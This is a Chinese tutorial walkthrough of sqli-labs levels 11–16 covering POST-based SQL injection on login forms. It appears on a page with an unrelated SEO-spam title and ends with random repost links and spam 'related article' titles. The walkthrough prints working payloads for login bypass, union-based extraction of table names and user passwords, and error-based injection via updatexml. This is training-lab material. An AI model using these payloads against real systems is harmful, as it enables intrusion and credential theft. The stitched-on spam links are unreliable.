当前位置: 首页 > wzjs >正文

东莞网站到首页排名html框架做网站

东莞网站到首页排名,html框架做网站,wordpress 伪静态 描述,it培训套路第11关 POST请求联合注入一、审题这一关开始变成了登录框输入,也就是post请求的表单提交。前十关都是get请求方式,可以直接在url栏中注入,这里的注入点换成了登录框。二、思考这里输入1会显示报错,可以判断出是单引号闭合。我们仔…

第11关 POST请求联合注入

一、审题

这一关开始变成了登录框输入,也就是post请求的表单提交。前十关都是get请求方式,可以直接在url栏中注入,这里的注入点换成了登录框。

二、思考

 这里输入1'会显示报错,可以判断出是单引号闭合。

我们仔细观察报错信息,MySQL 指出错误发生在查询的 '1'' and password='' LIMIT 0,1 部分附近,那么来推测一下原始的查询语句,可能是:

SELECT * FROM users WHERE username = '$uname' and password = '$passwd' LIMIT 0,1

假设在username框中输入1' or 1=1 #来尝试把后面的密码验证注释掉,看看是否能登录成功。

这里使用#注释符是因为post请求会完整传输,无需编码处理。

可以看到这里绕过密码,登录成功,页面显示了用户名和密码。

接下来尝试用联合注入获取更多数据。

三、做法

1.获取数据库名;

-1' union select 1,database()#

2.获取表名;

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

3.获取字段名;

-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#

4.获取字段数据。

-1' union select 1,group_concat(username,'~',password) from users#

第12关 ")闭合的联合注入

第13关  ')闭合的报错注入

这里登录成功没有回显位,但是登录失败会有报错信息。可以使用之前学过的报错注入。

-1') and updatexml(1,concat(0x7e,(select database())),3)#

第14关 双引号闭合的报错注入

第15关 单引号闭合的布尔盲注

只有正确和错误两种页面回显,可以使用布尔盲注。

第16关 ")闭合的布尔盲注

这几关都是通过POST请求的方式注入,把前面的联合注入,报错注入,布尔盲注又复习了一遍。


文章转载自:

http://8gMmUOkg.wcgcm.cn
http://jNtZwT1p.wcgcm.cn
http://qn85h58d.wcgcm.cn
http://UqJxs3Jo.wcgcm.cn
http://MZWsQM3n.wcgcm.cn
http://ALeRuSiw.wcgcm.cn
http://ZyHFaeSI.wcgcm.cn
http://X4FSQRy3.wcgcm.cn
http://QPYIYEBf.wcgcm.cn
http://lGmowr5H.wcgcm.cn
http://bLML6kuT.wcgcm.cn
http://OHV1Qajj.wcgcm.cn
http://Liwi3KKA.wcgcm.cn
http://EcmIAToB.wcgcm.cn
http://T1tPyl2E.wcgcm.cn
http://8tGXiHh1.wcgcm.cn
http://0B3bQDkd.wcgcm.cn
http://WfrrdFKM.wcgcm.cn
http://vuGndzE4.wcgcm.cn
http://Zq4yx2Rv.wcgcm.cn
http://yu4Clswg.wcgcm.cn
http://wIn8r6n3.wcgcm.cn
http://yzLK7Bkr.wcgcm.cn
http://Zpmj4zQ2.wcgcm.cn
http://l7CbAGeu.wcgcm.cn
http://0GWDCmq8.wcgcm.cn
http://ikYWYCqT.wcgcm.cn
http://cgaznvt8.wcgcm.cn
http://LLv9OMoy.wcgcm.cn
http://Akd635Qx.wcgcm.cn
http://www.dtcms.com/wzjs/643402.html

相关文章:

  • 网站模板 知乎wordpress问答插件
  • 做外贸一般去什么网站找客户软件工程项目
  • 百度商桥网站wordpress more修改
  • 咸宁网站建设哪家专业网站开发的进度安排
  • 北京企业网站建设哪家服务好施工许可证查询官网
  • 网站后台栏目根据什么做的网站怎么做首页比较好
  • 茶叶手机网站丹阳网站建设方案
  • 为什么网站显示建设中开发公司更换物业公司的请示
  • 做游戏用什么电脑系统下载网站设计开发输入清单
  • 如何建设营销型网站智博常州网站建设
  • 网站域名有效期网页设计图片怎么换
  • 成都前几年网站建设公司广州安全教育平台官网登录
  • 冷水滩网站建设滴滴出行的网站是哪家公司做的
  • 网站排队队列怎么做数码商城网站建设
  • 除了昵图网还有什么做图网站手机网站建设图片素材
  • 中国哪家网站做仿古做的好.net网站开发模板
  • 网站推广软件推荐爱客wordpress源码
  • 聊城做网站推广费用广东网站快速备案
  • 网站后台管理方便吗中国网站排名前100
  • 企业网站keywords最多几个什么软件做网站比较好
  • 单页网站域名免费网站模板代码
  • 湖南建设厅网站营销型网站建设公司地址
  • 微网站开发平台 知乎扬中网站建设案例
  • 旅游网站系统wordpress自然资源部网站绿色矿山建设
  • 深圳建网站seo西安推荐企业网站制作平台
  • 做图赚钱的网站有哪些孙红雷做的二手车网站
  • 做农产品的网站wordpress 蜘蛛记录
  • 建设部网站令第77号网站备案号没有-1
  • 湖南专业建站按效果付贿WordPress自适应播放器代码
  • 任务网站建设福田瑞沃自卸车